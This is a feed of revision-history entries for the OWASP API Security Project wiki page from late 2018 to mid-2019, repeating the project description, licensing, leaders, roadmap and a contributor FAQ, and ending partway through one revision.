&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
[[File:API Security Project Road map 2019a.png|alt=API Security Project Road map 2019|none|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252008</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252008"/>
				<updated>2019-05-31T12:15:00Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Remove redundant section - FAQ&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
[[File:API Security Project Road map 2019a.png|alt=API Security Project Road map 2019|none|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247937</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247937"/>
				<updated>2019-02-27T14:42:40Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: fixed typo in road map&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
[[File:API Security Project Road map 2019a.png|alt=API Security Project Road map 2019|none|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:API_Security_Project_Road_map_2019a.png&amp;diff=247936</id>
		<title>File:API Security Project Road map 2019a.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:API_Security_Project_Road_map_2019a.png&amp;diff=247936"/>
				<updated>2019-02-27T14:39:49Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;API Security Project Road map 2019&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247935</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247935"/>
				<updated>2019-02-27T14:33:41Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
